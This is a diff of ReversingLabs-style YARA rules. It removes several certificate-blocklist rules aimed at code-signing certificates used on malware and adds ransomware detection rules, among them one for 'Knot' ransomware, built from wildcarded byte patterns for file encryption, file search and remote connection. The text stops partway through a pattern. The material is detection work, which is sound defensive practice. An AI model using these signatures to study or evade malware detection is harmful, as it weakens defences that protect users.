REVERSINGLABS_Cert_Blocklist_082023879112289Bf351D297Cc8Efcfc : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "94a4e3d6-2d0a-5e5d-9ae8-574ef9be017e" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4816-L4832" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "58bec160445765ce45a26bf9d96ba6cfe61eee31e0953009d40a7ec64920c677" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STA-R TOV" and pe.signatures[i].serial=="08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" and 1573430400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0D53690631Dd186C56Be9026Eb931Ae2 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "4f60613c-4162-5b3d-989f-f79a06450f4d" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4834-L4850" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3d0a80c062800f935fa3837755e8a91245e01a4e2450a05fecab5564cb62c15c" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STA-R TOV" and pe.signatures[i].serial=="0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" and 1592190240<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_32119925A6Ce4710Aecc4006C28E749F : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "cfd51cb8-bd04-5ede-a73e-e924815a01f0" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4852-L4868" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ca812cdfbb7ca984fae1e16159eb0eeb1e65767fcc6aa07eeb84966853146f9d" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Maxiol" and pe.signatures[i].serial=="32:11:99:25:a6:ce:47:10:ae:cc:40:06:c2:8e:74:9f" and 1592438400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_2C90Eaf4De3Afc03Ba924C719435C2A3 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "06edc1a3-65b1-5a69-ab6b-4ffc3963513c" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4870-L4888" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5bb78a5e39f9d023cf63edabdc83d4965fc79f6f04f9fea9bcf2a53223fbd4ca" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AntiFIX s.r.o." and (pe.signatures[i].serial=="00:2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" or pe.signatures[i].serial=="2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3") and 1586293430<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Aff762E907F0644E76Ed8A7485Fb12A1 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "3b3bbbdd-9c2d-5c80-a121-3e3ad13e9ac6" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4890-L4908" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ad05389e0eb30cb894b03842d213b8c956f66357a913c73d8d8b79f8336bf980" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $remote_connection_p1 = { + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 0F B6 + 84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? + 83 C4 ?? 83 C3 ?? 46 83 FE ?? 72 ?? 8B 5C 24 ?? BE ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 50 + 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 + E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 8B F0 85 FF 74 ?? A1 ?? ?? ?? ?? 0F B6 04 06 50 B8 ?? + ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 C3 ?? 46 3B F7 + 72 ?? 8B 5C 24 ?? A1 ?? ?? ?? ?? BE ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B FB 8B F0 0F B6 + 84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 57 E8 ?? ?? ?? ?? + 83 C4 ?? 83 C7 ?? 46 83 FE ?? 72 ?? A1 ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? BB ?? ?? ?? + ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? + ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 + ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 51 ?? 66 8B 01 + 83 C1 ?? 66 3B C6 75 ?? 2B CA 8B 15 ?? ?? ?? ?? D1 F9 8D 72 ?? 8A 02 42 84 C0 75 ?? + 8B 3D ?? ?? ?? ?? 2B D6 8D 04 0A 8D 34 45 ?? ?? ?? ?? 56 6A ?? FF D7 50 FF 15 ?? ?? + ?? ?? 8B D8 8D 04 36 50 6A ?? 89 5C 24 ?? FF D7 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? + ?? 8B F8 FF 35 ?? ?? ?? ?? 89 7C 24 ?? 68 ?? ?? ?? ?? 56 53 E8 ?? ?? ?? ?? 33 C9 89 + } + $remote_connection_p2 = { + 44 24 ?? 83 C4 ?? 89 8C 24 ?? ?? ?? ?? 8B D9 85 C0 7E ?? 8B 44 24 ?? 0F B7 04 58 66 + 89 84 24 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? BE + ?? ?? ?? ?? 83 C3 ?? A5 A5 66 A5 EB ?? 8D 94 24 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ?? + 66 3B C1 75 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 + A5 8B CA 83 E1 ?? F3 A4 33 C9 8B 7C 24 ?? 43 3B 5C 24 ?? 7C ?? FF 74 24 ?? 51 FF 15 + ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 FF 35 ?? ?? ?? ?? 33 C0 50 FF 15 ?? ?? ?? ?? + 50 FF D6 8B 5C 24 ?? 53 33 DB 53 FF 15 ?? ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? + ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF D6 8B 5C 24 ?? 89 3D ?? ?? + ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF E9 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 + 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 8B F3 89 5C 24 ?? 8D 4E ?? 8A 06 46 84 + C0 75 ?? 8B 3D ?? ?? ?? ?? 2B F1 68 ?? ?? ?? ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 89 + 44 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? + ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B C8 8B F8 3B FE 73 ?? 81 F9 ?? ?? ?? ?? 74 ?? FF 74 + 24 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 04 1F 50 E8 + } + $encrypt_files_p1 = { + 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 8B CA 83 + E1 ?? 68 ?? ?? ?? ?? F3 A4 50 FF 15 ?? ?? ?? ?? 8B D8 33 FF 89 5C 24 ?? 89 3D ?? ?? + ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FB ?? 74 ?? 85 DB 0F 85 ?? ?? ?? ?? 33 + F6 8D 8C 24 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? BE ?? ?? ?? ?? 50 + 8D 44 24 ?? 8B D6 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B CE E8 ?? ?? ?? ?? 33 D2 + 8D 88 ?? ?? ?? ?? 8D 81 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8B 44 24 ?? C1 E8 ?? 89 + 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B F0 8B C1 F7 F6 40 0F AF 44 24 ?? 50 6A ?? 89 44 24 + ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? + 8D 44 24 ?? 83 C4 ?? 81 C2 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 39 5C 24 ?? 76 ?? 8B 44 24 ?? 8D + 54 24 ?? 8B 4C 24 ?? 2B C3 3B 44 24 ?? 0F 42 F0 8D 84 24 ?? ?? ?? ?? 50 8B 44 24 ?? + 8D 0C 39 68 ?? ?? ?? ?? 03 C3 56 50 E8 ?? ?? ?? ?? 03 7C 24 ?? 83 C4 ?? 03 DE 3B 7C + 24 ?? 72 ?? 33 FF 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 83 FB ?? 74 ?? 85 DB 74 ?? 57 8D 44 24 ?? + 89 7C 24 ?? 8B 3D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D7 33 F6 8D 44 + } + $encrypt_files_p2 = { + 24 ?? 56 50 FF 74 24 ?? FF 74 24 ?? 53 FF D7 33 FF 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 + FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 50 FF D6 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? + ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 F6 56 53 FF 15 ?? ?? ?? ?? 3D ?? + ?? ?? ?? 76 ?? 39 35 ?? ?? ?? ?? 75 ?? 56 53 FF 15 ?? ?? ?? ?? 56 8B F8 B8 ?? ?? ?? + ?? 56 50 53 2B F8 FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 56 8D 8C 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? 51 57 50 53 FF 15 ?? ?? ?? ?? 33 C0 50 50 50 + 53 FF 15 ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 53 FF 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF + 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? 89 5C 24 ?? FF 15 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA + ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? + 50 FF 15 + } + $find_files = { + 53 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 8D 85 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? + ?? ?? 33 DB B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? + 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C3 EB ?? 1B C0 83 + C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 + ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B + C3 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? + F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 + A5 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 66 A5 6A ?? 59 BE ?? ?? ?? ?? 8D + BD ?? ?? ?? ?? F3 A5 66 A5 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 50 E8 ?? ?? + ?? ?? 59 8B F0 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? + ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? + 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? FF 75 ?? + 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 75 ?? E9 ?? ?? ?? ?? FF 75 ?? E9 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 66 39 1F 0F 84 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lets Start SP Z O O" and (pe.signatures[i].serial=="00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" or pe.signatures[i].serial=="af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1") and 1594882330<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_D8530214Ca0F512946496B5164C61201 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Knot : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Knot ransomware." author = "ReversingLabs" - id = "0125a67a-d5e7-5c93-a58c-cacb6d8fa60b" - date = "2023-11-08" - modified = "2023-11-08" + id = "4dfe9da5-7ab1-57dc-95fc-b05777f235b8" + date = "2021-03-19" + modified = "2021-03-19" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4910-L4928" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "377962915586c9f5a5737c24b698c96efc2e819e52ee16109c405f9af2d57e7f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Knot.yara#L1-L118" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a7a3e13139d68314e583ec225a5d56373a551e67d46984dcf9a228a1f7275f14" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Knot" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DJ ONLINE MARKETING LIMITED" and (pe.signatures[i].serial=="00:d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" or pe.signatures[i].serial=="d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01") and 1595485920<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_661Ba8F3C9D1B348413484E9A49502F7 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "a0c501c9-a856-55b6-b845-aeab4db5ab51" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4930-L4948" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4840b311c1e2c0ae14bb2cf6fa8d96ab1a434ceac861db540697f3aed1a6833f" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 + FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 4D ?? 51 + FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 + ?? 32 C0 E9 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B + 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 + C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 + } + $encrypt_files_p2 = { + 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF + 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A + ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B + 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A + ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 + ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D + ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 8D ?? ?? ?? + ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 + ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 + FF 15 ?? ?? ?? ?? B0 ?? 8B E5 5D C3 + } + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 + ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F B7 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 89 95 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 83 F8 ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? + 73 ?? 8B 95 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 95 ?? ?? ?? ?? 83 FA ?? 75 + } + $find_files_p2 = { + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? 83 + BD ?? ?? ?? ?? ?? 73 ?? 8B 8D ?? ?? ?? ?? 8B 14 8D ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? + 50 E8 